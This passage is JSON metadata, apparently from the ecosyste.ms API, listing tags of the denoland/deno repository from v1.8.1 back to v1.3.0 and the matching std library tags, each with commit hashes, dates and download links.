deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"